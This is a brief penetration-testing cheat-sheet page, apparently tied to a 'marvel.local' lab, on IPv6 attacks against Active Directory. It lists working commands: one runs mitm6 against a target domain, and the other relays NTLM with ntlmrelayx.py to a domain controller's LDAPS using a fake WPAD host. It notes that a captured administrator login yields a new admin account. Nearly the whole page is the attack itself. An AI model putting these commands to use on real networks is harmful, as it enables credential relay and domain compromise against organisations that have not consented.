IPv6 Attacks

  • Get mitm6 tool

Commands

# Start mitm6
mitm6 -d TARGET_DOMAIN

# Relay attack 
ntlmrelayx.py -6 -t ldaps://DC-IP -wh fakewpad.marvel.local -l lootme

Note:

  • In order for this attack to work you need to cause some events to happen, like reboot a machine

  • If an administrator logs in while this attack is running, it will capture that and create a user with Admin permissions.

Last updated